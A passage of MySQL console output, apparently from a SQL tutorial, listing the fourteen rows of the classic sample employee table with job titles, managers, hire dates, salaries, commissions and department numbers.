|  7369 | SMITH  | CLERK     |    7902 | 1980-12-17 |  800.00 |    NULL |     20 |
|  7499 | ALLEN  | SALESMAN  |    7698 | 1981-02-20 | 1600.00 |  300.00 |     30 |
|  7521 | WARD   | SALESMAN  |    7698 | 1981-02-22 | 1250.00 |  500.00 |     30 |
|  7566 | JONES  | MANAGER   |    7839 | 1981-04-02 | 2975.00 |    NULL |     20 |
|  7654 | MARTIN | SALESMAN  |    7698 | 1981-09-28 | 1250.00 | 1400.00 |     30 |
|  7698 | BLAKE  | MANAGER   |    7839 | 1981-05-01 | 2850.00 |    NULL |   NULL |
|  7782 | CLARK  | MANAGER   |    7839 | 1981-06-09 | 2450.00 |    NULL |     10 |
|  7788 | SCOTT  | ANALYST   |    7566 | 1987-04-19 | 3000.00 |    NULL |     20 |
|  7839 | KING   | PRESIDENT |    NULL | 1981-11-17 | 5000.00 |    NULL |     10 |
|  7844 | TURNER | SALESMAN  |    7698 | 1981-09-08 | 1500.00 |    0.00 |     30 |
|  7876 | ADAMS  | CLERK     |    7788 | 1987-05-23 | 1100.00 |    NULL |     20 |
|  7900 | JAMES  | CLERK     |    7698 | 1981-12-03 |  950.00 |    NULL |   NULL |
|  7902 | FORD   | ANALYST   |    7566 | 1981-12-03 | 3000.00 |    NULL |     20 |
|  7934 | MILLER | CLERK     |    7782 | 1982-01-23 | 1300.00 |    NULL |     10 |
+-------+--------+-----------+---------+------------+---------+---------+--------+
14 rows in set (0.00 sec)

mysql>
```



